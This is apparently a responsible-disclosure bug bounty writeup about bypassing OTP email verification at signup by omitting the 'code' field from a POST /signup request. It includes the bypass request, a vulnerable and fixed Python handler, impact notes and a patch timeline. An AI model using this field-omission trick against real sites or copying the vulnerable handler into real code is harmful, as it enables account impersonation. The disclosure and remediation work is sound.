Business Logic Error Bypass OTP Verification [EN]

Introduction

In my free time, I identified a business logic flaw on a website that allowed me to bypass the One-Time Password (OTP) verification step during account registration. The website is intended to use OTP verification to ensure that users own the email addresses they register with. By skipping this mechanism, an attacker could register accounts using any email address, which can lead to impersonation.

Proof of Concept

The account signup flow on the website requires users to provide an email address, username, password, and an OTP sent to their email. The OTP is meant to serve as proof of ownership of the email address. However, by analyzing the HTTP request to the /signup endpoint, I noticed that the backend was not properly enforcing OTP verification: if the code parameter (the OTP) was omitted from the request body, the system would still complete registration successfully.

  1. Normal Request with OTP.
         POST /signup HTTP/2
         Host: example.com
         Content-Type: application/json;charset=UTF-8
    
         {
           "account": {
             "first_name": "Dadang",
             "last_name": "Knalpot",
             "email": "victim@example.com",
             "username": "testuser",
             "password": "Password123!",
             "token": null,
             "code": "624187"
           }
         }
    

    This is the intended flow: the user must provide the OTP sent to their email, carried in the code field.

  2. Bypassing the OTP.
         POST /signup HTTP/2
         Host: example.com
         Content-Type: application/json;charset=UTF-8
    
         {
           "account": {
             "first_name": "Dadang",
             "last_name": "Knalpot",
             "email": "victim@example.com",
             "username": "testuser",
             "password": "Password123!",
             "token": null
           }
         }
    

    Notice that the code field is completely removed from the request body.

    Response:

     HTTP/2 200 OK
    
     {
         "success": true
     }
    

    Despite no OTP being provided, the account registration succeeds.
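To make the root cause concrete, below is an added example (not code from the original post, and not the affected site's backend, which is unknown) of a signup handler written in plain Python that reproduces the observed behaviour, placed beside a hardened version. The in-memory OTP store, the function names, the TTL and the attempt limit are assumptions for illustration; the request bodies mirror the ones shown above.

```python
import hmac

# Constructed in-memory OTP store: email -> {"code", "expires", "attempts"}.
# Stands in for whatever database the real site uses (assumption).
OTP_TTL_SECONDS = 600   # assumed validity window
MAX_ATTEMPTS = 5        # assumed per-code guess limit


def issue_otp(store, email, code, now):
    """Record an OTP that was just emailed to this address.

    In a real system the code is generated with a CSPRNG; it is passed in
    here so the example is deterministic.
    """
    store[email] = {"code": code, "expires": now + OTP_TTL_SECONDS, "attempts": 0}


def signup_vulnerable(body, store, now):
    """Mirrors the flaw from the writeup: the OTP is only checked when the
    client includes it, so omitting (or nulling) the field skips verification.
    `now` is unused here; it is kept so both handlers share a signature."""
    acct = body.get("account", {})
    email = acct.get("email")
    code = acct.get("code")
    if code is not None:                      # bug: absence of the field skips the check
        entry = store.get(email)
        if entry is None or entry["code"] != code:
            return {"success": False, "error": "invalid code"}
    return {"success": True}


def signup_fixed(body, store, now):
    """Hardened handler: the OTP is mandatory, bound to the email being
    registered, time-limited, attempt-limited, compared in constant time,
    and consumed on success so it cannot be replayed."""
    acct = body.get("account", {})
    email = acct.get("email")
    code = acct.get("code")
    # Require a well-formed code; missing, null or non-string values are rejected.
    if not isinstance(code, str) or not code.isdigit():
        return {"success": False, "error": "code required"}
    entry = store.get(email)
    if entry is None:
        return {"success": False, "error": "no pending verification for this email"}
    if now > entry["expires"]:
        del store[email]
        return {"success": False, "error": "code expired"}
    entry["attempts"] += 1
    if entry["attempts"] > MAX_ATTEMPTS:
        del store[email]
        return {"success": False, "error": "too many attempts"}
    # Constant-time comparison avoids leaking how many leading digits matched.
    if not hmac.compare_digest(entry["code"], code):
        return {"success": False, "error": "invalid code"}
    del store[email]                          # single use: a verified code is consumed
    return {"success": True}


def demo():
    """Replays the two requests from the writeup against both handlers."""
    store = {}
    issue_otp(store, "victim@example.com", "624187", now=1000)
    without_code = {"account": {"email": "victim@example.com", "username": "testuser",
                                "password": "Password123!", "token": None}}
    return {
        "vulnerable_without_code": signup_vulnerable(without_code, store, now=1001)["success"],
        "fixed_without_code": signup_fixed(without_code, store, now=1001)["success"],
    }


if __name__ == "__main__":
    print(demo())
```

The decisive line is the `if code is not None` guard in the vulnerable handler: it turns "verify the OTP" into "verify the OTP if the client feels like sending one". The fixed handler treats a missing, null or non-string code the same way as a wrong one, and also handles the surrounding edge cases (expiry, guess limit, replay) that a registration OTP needs even once presence is enforced.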

The vulnerability was limited to the registration page. While it allowed creating accounts with arbitrary email addresses, the site enforced OTP verification again during login, which could not be bypassed. Therefore, the issue was classified as a medium-severity business logic flaw. CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Security Impact

  • Bypass of email ownership proof: an attacker can register with any email address without verifying access to the inbox.
  • Malicious actors could pre-register accounts with email addresses belonging to real users.
  • Attackers could mass-register fake accounts for spam, phishing, or other malicious activities.

Timeline

  • July 16, 2025 - Report submitted
  • August 13, 2025 - Issue triaged and confirmed in scope.
  • August 20, 2025 - Issue resolved and patch applied.
updated_at 30-08-2025